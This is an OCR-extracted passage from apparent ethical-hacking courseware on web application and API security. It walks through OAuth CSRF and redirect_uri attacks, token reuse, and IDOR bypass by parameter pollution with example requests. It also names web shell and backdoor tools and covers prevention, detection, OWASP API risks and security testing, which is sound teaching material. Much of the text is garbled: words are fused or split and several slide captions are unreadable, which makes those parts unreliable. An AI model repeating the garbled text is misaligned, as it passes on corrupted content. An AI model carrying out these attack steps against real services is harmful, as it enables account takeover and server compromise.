involvedin AuthorizationCodeGrant
Thereare four stepsinvolvedi n the authorizationcodegrant,through
whichattackers
can perform
various authorization
attacks
o n theAPI
The user passesthe GETrequestto the client via the user agentto initiate the
authorizationprocess. Thisoperation can be performed via the “Loginwith or
buttondisplayed
Connect― on the client's
site
Theuser agentc an beredirectedto theauthorizationserver bythe client usingthe
following
parameters:
*
response_type:Codeusedfor informing the server which permissions to
execute

client_id:
1Dassigned
to the client
redirect_uri:
URIwherethe authorization
server redirectsthe user agentwhen
theauthorizationcodeis provided

of to
scope:Definesthe level access the application
State:Opaque valueusedfor securityimplementations.
Thevalue is alsoused
for maintaining
the state betweenrequestandcallback
Whenthe user is authenticatedandauthorizedto accessthe resource, the user
agentis redirectedto redirect_uri
bythe authorizationserver. Theserver uses the
following
*
parameters
do
to this:
Code:Authorizationcode

ical andCountermensores
Mackin ©by E-Comel
Copyright
 * State:Valuesupplied
i n the abovementioned
request
© Using the accesstokenbyadding
the authorizationcode,the clientrequests the
following
+
parameters
Authorization_code
grant_type:
of
i n the body a request:

+ code:Authorizationcodereceivedin the previous message

+
redirect_uri:
URIusedin thefirst request
OAuth
Attacks bymanipulating
Various attackson OAuth performed the requests
stated above are
describedbelow:
Request
Attackon ‘Connect’
Most sites enableusers to access other websitessuchas Linkedin,Instagram,
and
Twitter,via OAuth,An attackercan exploit to connect one site to another,
requests
i.e., whenthe user hitsthe “Login button.Then,
with or Connect― he or shecan gain
illegalaccessto theclient-side account byconnecting
user/victim’s his/her
account
to the provider'swebsite.
to perform
Steps an attackon “Connect―
request:
‘+The
attacker
opens a fakeaccount on the provider's
‘Theattackerinitiates the “Connect―
website
operation with the client through his/her
fakeaccount on the provider'swebsitebuthaltsauthorizationserver redirects,
whichmeans that the attackervalidatesthe clientto access his/her
resources on
theprovider,
whiletheclientis not informed.

Y_
attacker
The

Usesmake
createsa malicious

logout
CSRF
to
provider.
webpageas follows:
the user on the
Again uses CSRF his/her
to makethe user login
on the provider
using fake
account credentials.
Y-
Spoofs provider
with
the firstrequest
to connect the
just anotherGETrequest. It is usually
account
performed
theclient.It is
insidethe <iframe>tagto
of
this
action.
maketheuser unaware
logged
Oncethe victim opensthe attacker'smaliciouspage,his/her account gets
out on the providerand connects as a fake account. Then,the attacker'sfake
account is connected
with thevictim’s
account on the client.Thevictim does not
as theattackerhasalready
asktheclientfor permission, approved it.
Hence, account on the clientside using
the attackercan loginto the victim’s
his/heron
the
fakeaccount provider.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Attackon ‘redirect_uri’
the domainis usually
While registering, specified
by the client and onlythose
“redirect_uri―
on the specific
domainare permitted.
If an attackercan identify
vulnerabilities he/she
suchas XSSon a web pageon the client domain, can exploit
themto capture authorizationcode.
Stepsto perform an attackon ‘redirect_uri’
The attackerleaks data througha vulnerablepage on the client domain:
https://xyz.com/vuln
on the page;then,the pagesendsthe
attackerinstallsmaliciousJavaScript
‘The
URL,whichis loadedi n the
theattacker browser
with and to
(along the parameterfragments)
attackercreatesa pagethatprompts
‘The the user to opena maliciouslink:
https://provider.com/oauth/authorize?client_id=CLIENTID&respons
th_code&redirect_uri=https%3A%2F%2Fxy2.com%2Fvuln
Whenthe victim opens the maliciouslink,the user agentis redirectedto
https://xyz.com/vuln?code=CODE,
andthe CODEis then exfiltratedto the
attacker
Now,the attackeruses the retrievedcode to provide
the access token via
suchas https://xyz.com/oauth/callbback?code=CO
authentic‘redirect_uri’
SRF on Authorization
Response
Theattackerperforms attackto connect a fakeaccount on the provider
a CSRF with
the victim’s
authorization
code client
side. a
account on the

grant,
Thisattackexploits third requestrelatedto

‘Steps
to perform
CSRFon authorizationresponse:

The attackeropena fakeaccount on the provider

+ Theattackerstarts a “Connect―
operationwith the client through his/herfake
account on the provider,but haltsauthorizationserver redirects,whichmeans
that the attackerhasvalidatedthe client to access his/her resources on the
provider, while the client is not informed. Hence,the attacker stores the
authorization_code.
The attacker persuades
the user to send a request to
https://xyz.com/<provider>/login?code=Auth_Code.
This operationcan be
implemented
byluring
thevictim into openinga malicious
linkembedded with
an imgor
with
abovementioned
scripttagalong the
source. link as
into the client,the attacker'sfakeaccount is connectedto
Whenthe victim logs
the
victim'saccount

ical andCountermensores
Mackin ©by E-Comel
Copyright
‘Now,the attackercan signi n as the victim o n theclientbylogging
i n with his/her
fakeaccount on the provider
TokenReusage
Access
OAuth requires unique access tokensfor individualclients.It ensures that these
tokenssavedon the authorization server are mapped to relevantscopes and time
expiry.Accesstokensprovided for “ClientA― Attackersexploit
can workfor “ClientB―.
to perform
this feature attackso n clientsthatallowgrants implicitly
Steps
The
access
to reuse tokens:

attackerdevelops
a legitimate “clientA―
clientapplication andenrollsit with
some provider
Now,the attackerluresthe victim into accessing and gainsillegal
“clientA―
accessto the victim’s
accesstokenon “clientA―

Letus considerthatthevictim accesses“client―,

whichusestheimplicitgrant.In
such a case, the authorization server redirects the user agent to
https://clientB.com/callback#access_token=ACCESSTOKEN.
Now,the attacker
access_token.
can openthisURLwith client’s

Therefore,
Theattackeris verifiedas a validentityby“client―. one accesstoken
is sufficient
using
foruseon manyclients the
implicit
grant.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 OtherTechniques
to Hack an API

Asn
the
reves
Engineering
Reverse
oder |
Atachrsime
chuneatedweve usage
los esi intheAta cane

User
Spoofing

‘Man-in-the- tacks parform

MITM
attacks
using
domain
squatting
copying
resource
locations ad AP to

Engingering nome

Other Techniques
to Hack an API
Different
waysto hacka n API are discussed
below:
Reverse Engineering
Viewing the APIsfromthe developer's viewpointcan beflawedbecauseit checksonlyif
a n API is workingas intended. Onceit is deployed fortheend-user experience,it may
not work as it worked i n the developer environment. This is what attackersoften
attempt to dowhile reverse-engineering the API.AttackersinvokeAPIsi n reverse order
to identify theflawsresidingin theAPIthat can beobfuscated i n real-timeusage.

an anflow
Forinstance, consider orderis madeusing the same account that is already
earlierbooking.
Theorder appears
to besomething
like
usedfor
this:
Ordermade
©

©
Order linkedwiththe account
Orderis accepted
Attackerscan use thisflow i n the processof reverse engineeringan API. If the accepting
mechanism is carriedin the reverse order,the internalAPIusedto connect ordersto
accountscan be crashed, thereby forcing
the browserto exposethe account detailsof a
user.
UserSpoofing
It is a the original
processof concealing identityandmasquerading as some othervalid
most cases,the attackertries to exposehimselfa s a legitimate
entity.In user with
special
privileges
and provides free data access to additional users to cause more

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Attackers
damage. fromphishing
use detailsobtained leaking
or any otherinformation

as
the
methodsto masqueradeoriginal
user.

If attackerscan successfullybreak into the system, theycan perform some typeof

privilege escalationattackbyredirectingthe URIfunctionto anotherURI,injectingcode
that serves as text,or bombarding
the APIwith excessive data,causingbufferoverflow.
‘Man-in-the-Middle Attacks
In an MITM attack,attackerswatchtheAP!communicationswith the server or behave
themselves as a server byintercepting
the requestcalls.Theattacker'smotive,i n this
is to provide
‘case, fakelinksthat appearto be legitimatein API interaction. These
attackscan becarriedout bydomainsquatting andcopying APIresource location,
For instance,the user might
via
makea resource call the API.io/media/function,
attackermightbe sittingat the APO.io/media/function.
can makea significant
A change in a single
andthe
character
difference.If the user clickson the secondlinkwithout noticing
theURLmisinterpretation, he/shewill beproviding sensitive informationto an attacker-
controlledserver.
Replay
Session Attacks
Session replay attackscan be launched
on websitesandother sources that initiate and
store sessions. Theseattacksare usuallyperformed to obtain session IDsand replay
themto the server. In this case, attackersrewindthe sessiontime and promptthe
to the as asimilar
SocialEngineering
request
server disclose information though is made once again.

Although
it maynot bea directAPI attack, through
socialengineeringcan beperformed
the API,Socialengineeringdoesnot affecttheAPIor the machinecode;itis a technique
‘employed
to trick users into divulgingtheir credentialsor other sensitive information
Phishingis a technique oftenusedto sendmaliciouslinksto usersvia emailto reset or
validate their securitycredentials.Spear-phishing is another sophisticated social
engineeringattack in whichadditionaldata is provided to the users,making them
believethat they with a validendpoint.
a re interacting

Ifthe user enters his/her

transactions,
o n thefakelink,
credentials
launchfurther attackssuchas modifying
usingthestolencredentials.
attackerscan capturethe dataand
the account detailsand illegitimate
online

ical andCountermensores
Mackin ©by E-Comel
Copyright
 RESTAPIVulnerability
Scanning
AM
(@REST une

Caltial data
intraduce
ik

theftandintermediate
data
that

Brokento
AF,
detect
that
Ata lems attaches

authenieson,
ESTA ae were

andSesion management

[REST
Seaning
3a
Toole
APIVatnerabity

enc wf

OMS?240 wacars.

RESTAPI Vulnerability
Scanning
REST API vulnerabilities
introduce the same risksas securityi ssuesi n webapplications and
websites.Theserisksincludecriticaldata theft,intermediatedata tampering, etc. Performing
thorough
exploit.
scanningon REST APIscan
Attackerscan use toolssuchas Astra,
API vulnerability
scanning,
expose
various underlying
Fuzzapi,
W3ef, andAppspider that
vulnerabilities attackerscan
to carryout REST

=
Astra
Source:https://github.com
Attackersuse the Astratool to detectand exploit underlying
vulnerabilitiesi n a REST
API. Astra can discoverand test authentications suchloginandlogout; thisfeature
makesi t easyfor attackersto incorporate it into the CICDpipeline.
Astracan invokeAPI
collectionasan inputvalue; hence,it can alsobe usedfor scanning RESTAPIs.
Astraallowsattackersto detectRESTAPIsthat are vulnerable
to attackssuchas XSS,
SQL injection,information leakage, CSRF, broken authentication and session
management, JWTAttack, blindXXEinjection,
CRLFdetection,CORS misconfiguration,
andrate limiting.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 14:2: Screenshotof stra
Figure
APIvulnerability
SomeREST toolsare as follows:
scanning
*
(https://github.com)
Fuzzapi
+
wBaf(http://docs.w3af.org)
=
appspider
(https://www-rapid7.com)
Voki (https://www.vegabird.com)
OWASP ZAP(https://www.owasp.org)

Module4 1922
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
 IDORvia ParameterPollution
Bypassing
|G: nsecure decobjetreference

data
abject
dtabaee
keys,
directories,
fs,canbe
exploited
by
thatarses when developers
sa wunerablity
(1DOR) disclose
references
to

atackr
modify
references
and
gain
acces
Internal enforcement suchas andother that
an to the unauthoriced to data
fr example, consider
thisnormal
eques
spi ays. com/profiie/aser_4d= 321

spt ays con/proftie/uses_<de6S¢euser_sde321

Bypassing IDOR via Parameter Pollution

(IDR)i s a vulnerability
Reference
InsecureDirectObject thatariseswhendevelopers
disclose
references to internaldataenforcementobjectssuchas databasekeys,directories,
andother
files,whichcan be exploited byan attackerto modifythereferencesand gain unauthorized
access to the data. TheseIDORs c an be bypassedbyproviding a singleparametername

butunique
repeatedlywith
values.
Forinstance,assumethat the victim’s is 321.Attackerscan change
user_id this user_id
valueto
654 (it is anotheruser_idvalue) to identify
IDOR.If the page is not vulnerableto IDOR, it
generates a “401
Unauthorized―
error message.
To bypass IDORvia parameter pollution,
the attackersendstwo user_id parameters as a
request, i n whichone parameter is appended user_id
with the victim’s andthe other one is
appended withthe attacker's
own user_id.
Forexample,
considerthe following
request:
api xyz.con/profile/user_id= 321
Theattackermanipulates
the abovementioned pollution
requestusing parameter to bypass
IDOR
api xyz con/profile/user_id=654cuser_id=321
Whenthe abovementionedrequesti s processed at the REST API endpoint,
the application
verifiesthe first user_id
parameter and ensures that the user who is sending
the requesthas
included
his/her own user_Id
in the GETrequest,

ical andCountermensores
Mackin ©by E-Comel
Copyright
Hence, IDORbyproviding
an attackercan bypass two user_id one belongs
parameters: to the
victim andtheother
validrequest. belongs
to the attacker.Theapplication
is trickedinto to considering
it as
a
Attackersuse toolssuchas Burp Suiteto proxythe trafficand intercept all the traffic to REST
API endpoints. Then,theyuse the parameter pollution technique to sendboththe attacker's
user_id user_id
andthe victim’s in the GETrequest to gain unauthorizedaccessand retrieve
sensitive datafromthe victim’s
account. Usingthis technique, attackerscan alsocompromise
the application'sfunctionality
becauseeveryparameterinsidethe application is vulnerable to
thisattack.

Figure of
Burp
14.93:Screenshot Sute

ical andCountermensores
Mackin ©by E-Comel
Copyright
 WebShells

languages
thenaccessor
‘Aweb
sellsa malicouspce ofcodeor scriptthats developed server-side
using Such
as PMPASP,
RUBY,
PERL, andPythonandae stale ona target eerer
‘The
malicious atackers to gan
septenables remote capablitis
emote administration t othe tage

inject sript byexploiting

inclusion
(LF), i
_tackers malidous most common vanerabltes
such as emote le neluson (RF
localfle of administration
exposition

As—
Web Shells
‘Awebshelli s amalicious pieceofcodeor scriptthat is developed usingserver-side languages
suchas PHP, ASP, PERL, RUBY, and Python,
andtheninstalledon a targetserver. Themalicious
scriptenables attackers to gain remote accessor remoteadministration capabilities over the
targetserver along with its file system,
Attackersinjectmaliciousscripts byexploiting
most common vulnerabilitiessuchas remote file
inclusion(RFI), localfile inclusion(LF),expositionof administrationinterfaces, and SQL
Attackerscan also perform
injection, XSSattacksusing socialengineering techniques to install
themalicious
code.
Attackersalsoemploy networkmonitoring tools (mainly Wireshark)to discovervulnerabilities
that can be exploited later for web shell injection.Thesevulnerabilitiesoften lie i n a web
server'ssoftware or content management system (CMS).
Webshellsare usedbythe attackerto carryout privilege escalationandgainremote accessto
download, upload,erase, and execute files on the targetweb server. Using the web shell,
attackersc an alsostealprivatedata,damage thewebsite’s via DDoS
reputation attacks,
change
the structure of the website, makethe web page's resources unavailableon the Internet,
exfiltratedata,ete
maintain persistence,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 14.94:
Figure thstrationofa webshel

ical
Mackin
and ©by CountermensoresCopyright
E-Comel
 WebShellTools

Web Shell Tools

Attackers
use various webshelltoolssuchas WSOPHPWebshell, 374k,C99,Chinachopper,
57, andWSO(web shellbyoRb)to gainremote controlover targetwebservers.
‘=
WSOPhp
Webshell
Source:https://github.com
WSOPhpWebshelli s a web shellthatallowsattackers to monitor runningprocesses
and execute remote commands to download, upload,
erase, or edit files. It alsoallows
attackersto accessandinfectremote servers andaccessSQL databases.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 14.95:
Figure Screenshot
ofWSOPhp
W ebshell
Someadditionalwebshelltoolsare as follows:
=
b374k(https://github.com)
=
99 (https://github.com)
=
Chopper
China (https://www.fireeye.com)
R57(https://github.com)
PouyaASPWebShell(https://github.com)

Module4 1929
Page ical andCountermensores
Mackin
©
by
Copyright E-Comel
 BackdoorAccessvia WebShell
Gaining
srcers
(G
exploit non-validatedi l e uploads
to inject
malicious srt webserver
na arget

| wetals
Weevely
backoor
acces
without
being
\e-Aacers suchas toga to a web traced

halos
attackers
Weve ato
spreading
backdoors
acrosthe targetnetwork
i n performing aminstrtve tats, maintaining and
persistence,

GainingBackdoor Accessvia Web Shell

Gaining backdoor accessrefers a websitei n a stealthy
to entering way.Thesebackdoors are
often installedvia some unvalidateduploads.Suchvulnerability allowsattackersto upload
harmfulfilesto thetarget developed
web server. Websites usingPHPare often susceptibleto
suchattacks.Attackersuse toolssuchas Weevelyto gain backdoora ccessto a websitewithout

being
traced,
Weevely
=

Source:https://github.com
use Weevely
‘Attackers to develop a backdoorshelland upload it to a targetserver to
gain remote shellaccess. Thistool alsohelpsattackersi n performing administrative
tasks,maintaining
persistence,andspreadingbackdoors acrossthe targetnetwork.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 14.96:ScreenshotofWeevely
Figure

ical andCountermensores
Mackin ©by E-Comel
Copyright
 How to PreventInstallationof aWebShell

ering atin

[is erate became

How to Prevent Installation of a Web Shell

forpreventing
Variousbestpractices theinstallation
of a webshellare discussed
below:
=
Update andhostserver's
the application operating patches
systemandapply regularly
to protectit fromknownbugs
Establish zone (DMZ)
a demilitarized betweenthe webserver andtheinternalnetwork
Ensuresecure configuration
of the webserver usingstrongauthentication
techniques
andavoidusing defaultpasswords
Blockallthe unusedportsandunnecessary services runningi n the webservers

Perform user inputdatavalidation

to controlandprevent localfileinclusion andremote
file inclusion(LFand RFI)vulnerabilities
Establish
a reverse proxy service for retrieving
to knownlegitimate ones
resources
the
and restricting admin
URLs

Performregular
vulnerability
scansto detectthe areas of threatsusinganyweb security
software
Deploy
firewallso n thewebserver to monitor andcontrolthenetworktrafficbasedo n
the security
rules
Deactivate directory
browsing
i n the webserver to preventdirectory
traversalattacks
Regularly
audit the accountsand review the group permissionsto preventthe
a
installationof webshellfromtheweb server to theinternalnetwork
Disableall unusedand risky
PHPfunctionssuchas exec(),
shell_exect),
show_sourcet),
proc_open(), passthru(),
andpentl_exec()
ical andCountermensores
Mackin ©by E-Comel
Copyright
Use escapeshellarg()and escapeshellemd()
to ensure that the user inputsare not
injected
into the shellcommands
to avoidcommand execution vulnerabilities
Ensurethat all the web applications
usingupload
forms are secure and permitonlythe
whitelistedfilestypes
‘Avoid
usingcodefromuntrustedwebsitesor onlineforums
Do not install unnecessary third-party
plugins
and regularly
checkand update
the
plugins
used

ical andCountermensores
Mackin ©by E-Comel
Copyright
 WebShellDetectionTools
CEH
‘Web
Shell Detector
(©
Web
shell
Detectors
Pythor-based
a PHO/

script
that asst in
a nddiscovering
scanning
holeeipen/sp/arpsels

‘Web
Shell Detection Tools

© oo t/ha
com)
Web Shell Detection Tools
Attackers
try vulnerabilities
often to discover
targetthe web servers. Then,
i n an application
or web page,through whichthey
theyexploitthosevulnerabilitiesto installbackdoorsvia web
to remote
shells gain
suchattacks, access andperform
it is mandatory
professionals
maliciousoperationson the target
to carry out regular
use tools suchas WebShellDetector,
server. To prevent
web shell or backdoorscanning. Security
NetworkSecurity,
Firefye and NeoPIto
detectthesewebshellson the targetservers.
=
WebShellDetector
Source:https://www.shelldetector.com

php/cei(perl)/asp/aspx
discovering
script
WebShellDetectori s a PHP/Python-based that helps
shells.It has a web shellssignature
the webshell―.
anddiscovering
i n scanning
databasethat helpsi n

ical andCountermensores
Mackin ©by E-Comel
Copyright
 WebShellDetectorv1.62

Someweb shelldetection
toolsare listedbelow:
Firetye NetworkSecurity
(https://www
fireeye.com)
=
NeoPI(https://github.com)
=
AntiShellWebShellHunter (http://antishell.com)
Astra(https://www.getastra.com)

ical andCountermensores
Mackin ©by E-Comel
Copyright
 SecureAPIArchitecture

‘Apts
ace latest
vulnerable
Cyberattacks
t othe andmostsophistiated
de tovarioussecurity
flawsinduced
by90

ae
T osafeguard

a
As fromthese attacks,secu professionals
anddevelopers
nee tocreatesecure AParchitecture,
‘ective
security andmitigation
strategies, plies

drastic ae 7
&
etet al
possible attacks

AP
gateways
provide
many
security
capitis
ein
security
and
contol andauthenticationtheAPL
intgity,auatmanagement,
“=
~~

SecureAPI Architecture
APLis a popular
technology
that actsas a gateway
forcommunication andintegrates
different
applications
usingthe web.API is widely
employed
due to its advancedtechniques
and its use
oftheprevailing

transparency.
infrastructure.
To safeguard API fromtheseattacks,
to
itis vulnerable the latestandsophisticated
to various securityflaws induced by poor programmingpractices
security
cyber-attacks due
and also due to its
professionalsanddevelopers need
to establisha secure APIarchitecture, effectivesecuritystrategies, andmitigationpolicies.
API architectureis built using an API gateway consisting of firewallsthat work as a server to
controlthe trafficand detectall possible attacks.Executing the securitypolicy for the API
securityarchitectureis achievedbyisolating the API implementation and API security into
differentlayers.Theselayers emphasize thattheAPI design andAPI securityperform different
rolesthat require a differentfieldof expertise. It focuseso n the logicalseparationof concerns,
whereone emphasizes the knowledge
Undera secure API architecture,
of
solving
the rightproblem
the API developerfocuses
at the right
time.

onlyon the application

domain,
ensures that all of the API is properly
designed,
and helps AP!with different
i n integrating
applications. processof the published
Thesecurity API is implemented
bythe API security
professional;
hence,
theAPIdeveloper with securingthe published
neednot beconcerned API.
Only securityprofessionals authority apply
A PI havethe to securitypoliciesto APIs i n the
Theseprofessionals
organization, mainlyfocuson identity,
threatsi n the API,anddatasecurity.
Hence,theyneedadvancedandappropriate toolsto performsecurity tasks,whichare separate
fromthe API implementation. Securityprofessionals
use API gateways that are hardened
appliancesavailablei n both physical
and virtual forms.Thesegateways are installedi n the
zone (DMZ)
demilitarized of an organization.
The API gateway alsoacts as a secure proxy
betweenthe internal applicationand the externalpublicInternet. It providesmany security

ical andCountermensores
Mackin ©by E-Comel
Copyright
capabilities
and controlsto admin,suchas access control,
the API security threatdetection,
confidentiality, audit management,
integrity, authentication,
messagevalidation,
and rate
of
all
limiting theAPIspublished
bytheorganization

Enterprise
Network

Feew Internal API Servers

—
Devices
_Integrations
Cloud
‘Mobile api
API Clients
Driven

14.9: SecureAP architectare

Figure

ical andCountermensores
Mackin ©by E-Comel
Copyright
 APISecurity
RisksandSolutions

APISecurity Risks and Solutions

Source:https://www.owasp.org
According
to OWASP,the following
are the top 10APISecurity
Risks
andSolutions:
APL
Risks Performobject-level
Solutions
authorizationchecksfor everyfunction
the datasource with inputfrom the user
BrokenObject accessing

Level Scrutinizetheimplementation

‘Authorization
Implement a robust
unpredictable object
IDvalues
oftheauthorization
access controlpolicy
policies
for randomand,

Usestandardand uniformauthenticationmechanismsfor allthe

APLendpoints
BrokenUser Examineand implement theauthenticationrequirements
within

Authentics theApplication Verification

Security (ASVS)
Standard
beforeexposing
Makesure to have strongbusinessrequirements
tnauthenticatedAPIendpoints
publicly
proper
Excessive filtering
Data
Ensurethat
not on theclientside
is performed
on the server sideand

‘Pos
Exposure

Lackof
and
Resources
Scrutinizethedataflowfromtheendpoint
Ensureappropriate
UseOWASP
rate-limiting
controls
to theclient
a re i n place
AutomatedThreat Handbookas a knowledge source
RateLimiting for preventing
botsfrom consumingyour resources

ical andCountermensores
Mackin ©by E-Comel
Copyright
BrokenFunction Avoid function-level
authorization
Level Usesimple andstandard authorizationand enablethedefault
Authorization settingto deny
Mass Do not exposethe internalvariableor object names as inputs
Assignment Ensurewhitelistng that the clientcan update
of all the properties
PerformhardeningprocessagainstAPIcontinuously
Security Usescanningtoolsand humanreviews to examine the entire API
Misconfiguration misconfigurations
stackfor security
inputvalidationandwhitelisting
Perform
Implement interface
a parameterized for processinginboundAPI
Injection requests
Ensurethat the filtering
logiclimitsthenumberof records
returned
ofal AP environmentsincluding,
Maintainproper inventory
production, testing,anddevelopment
staging,
Improper
Assets
‘Management standardizinga of
functionsall
review
Conductsecurity
APIs, mainly
focusing
on

a
Create risklevelranking
functions
of theAPIsandimprovethesecurity
a higher
for APIshaving risklevel

Insufficient
Logging and
Use
standard
response
Regularly
logging
activities
formatforall the APIsthat support

i n allphases
monitor alltheAPIendpoints of
incident

‘Monitoring
production, testing,anddevelopment
staging,
Table 165: Top1 0APISecuryR isks
OWASP andSolutions

ical andCountermensores
Mackin ©by E-Comel
Copyright
 BestPracticesforAPI Security
Use
server
gunerated
a8 tokens embededn
HTML en andict el sear sessment ec ate

Usecate
of
what
Employ
ifr vet It sta Pade cht orc ated narmton

made
bys
wthins
pater
tine
“

ane clent fame week te Pruge

that
ut cla
Open
Cannel
nee 20Sate Okth2 and
Doptoten

Best Practices for API Security

Variousbestpractices cyberattacks
forsecuringAPIsagainst are asfollows:
=
Usethe HTTPSprotocolthrough SSL/TLScertificatesthat support techniques:
encryption
andprovide
a secure connection betweenthe server andtheclient

Useserver-generated tokensembedded i n HTML as hidden fieldsfor validating the

incomingrequest andto checkif tis froman authenticatedsource
Sanitizethe datato eliminatethe maliciousscriptand perform proper validationof the

user input
Use an optimized firewall to ensure that all the unused,unnecessary
files and
permissive rulesare revoked

to
UseIP whitelisting create a list of trustedIP addresses
to limit the accessto onlytrustedusers or components
to accessAPIsand
or IP ranges

Use the rate-limiting

featureto limit the numberof API callsmadebythe client i n a

time
particular frame
Maintainand monitor accesslogs
regularly
to helpin detecting
anomaliesand to take
measures i n the future
precautionary
Implementa pagination technique that can dividea single
responseinto several
fragments
so that the payloadsare not oversized
Use parameterized statements i n SQL
queriesto prevent that includeentire SQL
inputs
statements

ical andCountermensores
Mackin ©by E-Comel
Copyright
Performinputvalidation on the server side insteadof the client side to prevent
bypassingattacks
Conductregular
security
assessmentsto secure all the API endpoints
usingautomated
tools
Regularly
monitor and perform
continuous auditing
of the API and analyze
the
workflows anyattacks
to prevent

toestablish
Usetokens trustedidentitiesandto controlaccessto servicesandresources

Use ensure
that
signatures
Employ
packet
to onlyauthorized
or
userscan decrypt modify the data
sniffersto track events relatedto informationdisclosureand to detect
insecure APIcalls
Usetechniques
suchas quotasand throttling
to controlandtrackthe API usageand to
set theAPI requestlimit
Implement to authenticatethetrafficandcontrolandanalyze
APIgateways theusageof
APIs
Implement
advancedtechniques
to preventsophisticated
human-likebots from
accessing
Implement
the
APIs.
multifactor authenticationand use authenticationprotocols such as
AppToken,
OAuth2,and OpeniDConnect to authenticatethe users and applications
in
theAPI
Documentaudit logsbeforeandafter every security
event,and makesure to sanitize
thelogdatato preventloginjection
attacks

ical andCountermensores
Mackin ©by E-Comel
Copyright
 BestPracticesfor Securing
Webhooks

receipt
repicatan
.

againsevent

Tackevent io 0 double
pocesing

ansoutgng
te

Incoming sumtin ant pate data ne A apy

Best Practices for Securing

Webhooks
forsecuringwebhooks
Variousbestpractices are asfollows:
=
insteadof HTTPto safeguard
UseHTTPS thedatafrombeing
exposed
whenin transit
*
Use sharedauthenticationsecrets such as HTTPbasicauthenticationfor all the
‘webhooks
to preventanyrandom malicious
data
Implement
webhooksigningto verify (Email
the data receivedfromthe ESPs Service
Providers)
anduse the constant time-comparefunction
Trackevent_idto avoid unintentionaldouble-processing
of the same events through
replay
attacks
Ensurethat the firewallrejects
webhookcallsfromunauthorizedsourcesotherthanthe
ESP’s
IP addresses
Userate limiting
o n webhook
callsin the web server to control the incomingand
outgoing
traffic X-Cld-Timestamp
the requesttimestamp
Compare of the webhookwith the current
timestamp timingattacks
to prevent
Validatethe X-OP-Timestamp
withinthethresholdof the current time
is idempotent
Ensurethatthe event processing event receiptsreplication
to prevent
Ensurethat the webhook code responds with 200 OK (success) insteadof 4xx or Sxx
statusesin caseof errors to ensure that thewebhooks a re not deactivated
Ensurethat the webhookURLsupports
the HTTPHEADmethod to retrieve meta-
information
entire
withouttransferring
the content

Module4 Page1952 ical andCountermensores

Mackin Copyright
by E-Comel
©
Usethreaded to sendmultiple
requests at the sametime andto update
requests datai n
theAPIrapidly
the store_hash
Make sure that the tokensare storedagainst and not against
the user
data

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

Application
‘Web Concepts
——_——_=S=—
Woo Applicaton

Web
Application API,
Threats andWebhooks,
Web
Web
Shell

———_=[[_
»—_—
WebApplication
Security
|

— 7

Web Application
Security
After learning
the hacking methodologies adopted byattackersof web applicationsand the
toolstheyuse, it is importantto learnhowto secure theseapplications fromsuchattacks.A
carefulanalysisof security will help
you, as an ethicalhacker,
to secure your applications.
Todo
design,
s0, one should develop, andconfigure webapplications usingthe countermeasuresand
techniquesdiscussed in thissection.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 WebApplication
Security
Testing
1
|*
notes tating
tena
wing
mast
at,
pletion
woteccctrtneunates catomaed
he cede
entnenes
esened
cea opens
aso rae een

Dynamic
Application
@asn)

Web Application
Security
Testing
Web application a processof conducting
securitytesting is securityassessment and
performance
analysis
of an application timelyreportso n its security
andgenerating levelsand
threatexposures.
It is oftenconducted bysecurityprofessionals
andprogrammers
to test and
strengthen
the security of an application
usingthe following
techniques:
‘=
ManualWebApplication
Security
Testing
Manualsecuritytesting involvestesting usingmanually
a web application designed data,
customizedcode,and some browserextension tools such as SecApps to detect
vulnerabilitiesandweaknesses associated It mainly
with the applications. focuseson
logic
business e rrors andthreat analysis.
Securityprofessionals
alsouse othertoolssuch
as Selenium, JMeter,Loadrunner, QTP,Bugzilla, and Test Link to perform manual
testing.
WebApplication
‘Automated Security
Testing
It is a technique
employed
for automating
the testingprocess.Automatedtestingtools
can beused
forthe rapid
discovery
ofvulnerabilities manner so thatthey
in a systematic
can be patchedeasily.
Thesetestingmethodsand procedures are incorporated into
eachdevelopment stageto reportfeedback constantly. Changesi n everypieceofcode
can be analyzed
anddevelopers are instantly
notifiedif anyvulnerabilitiesa re detected
Securityprofessionals
use tools suchas Ranorexstudio, TestComplete, LAPWORK,
KatalonStudio,
andTestsigma to carryout automatedtesting,
StaticApplication
SecurityTesting(SAST)
Static application i n whichthe complete
is alsoreferredto as a whiteboxtesting,
testing
systemarchitecture(includingits source code)or application/softwareto be testedis

Module4 ical andCountermensores

Mackin ©by E-Comel
Copyright
already
knownto the tester. SASTtoolsassistdevelopers the source codeto
i n testing
discoverandreportdesign flawsassociated with the application,
whichcan open doors
forvarious attacks.It alsoensures thatthe source codeis compliantwithdefinedrules,
standards, and guidelines. Securityprofessionals use tools such as CovertyStatic
Application Security Testing, Appknox, AttackFlow, bugScout,and PT Application
Inspector,to perform SAST.
Dynamic
Application
Security
Testing
(DAST)
UnlikeSAST, DASTis knownas a blackbox i n whichthe system
testing, architectureor
applicationto betestedis not knownto the testers.DAST toolsexecute on runningcode
to identifyissues related to interfaces, requests/responses, sessions, scripts,
authenticationprocesses, etc. They
codeinjections, allowtesters to discoverunderlying
DASTtoolsalsouse fuzzing,
vulnerabilitiesor flawsi n web applications. whichrefersto
throwing unexpected and unvalidatedtest casesat a web page.Security professionals
use toolssuchas Netsparker, Acunetix Vulnerability,
HCLAppScan, Micro FocusFortify
Demand,
‘on andAppknox, to performDAST.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 WebApplication
FuzzTesting

ett
eoaing
error
and
(©webaptcaton zt stg rags ack boxesting
nwa apes
seeurtyoopales
ethos. Ra
quay
checking
anderen ecg ee 0

Fuzz TestingScenario

2 Fur
Program joo->)HTTP
Cent

Web Application
Fuzz Testing
‘Web fuzztesting(fuzzing)
application is a blackbox testingmethod.It is a quality checking
and
assurancetechniqueusedto identify
coding loopholes
errors andsecurity i n web applications.
Massiveamountsof random are generated
datacalled“fuzz― byfuzztesting tools(fuzzers)
and
Usedagainstthe targetweb application to discovervulnerabilitiesthat can be exploitedby
Attackersemploy
various attacks. various attack techniques to crashthe victim'sweb

employ
application
and
applicationscause havocin the leastpossible
thisfuzztesting
against
technique
time. Security
to test the robustness
attackssuchas bufferoverflow, DOS,XSS,
personnel
andSQL
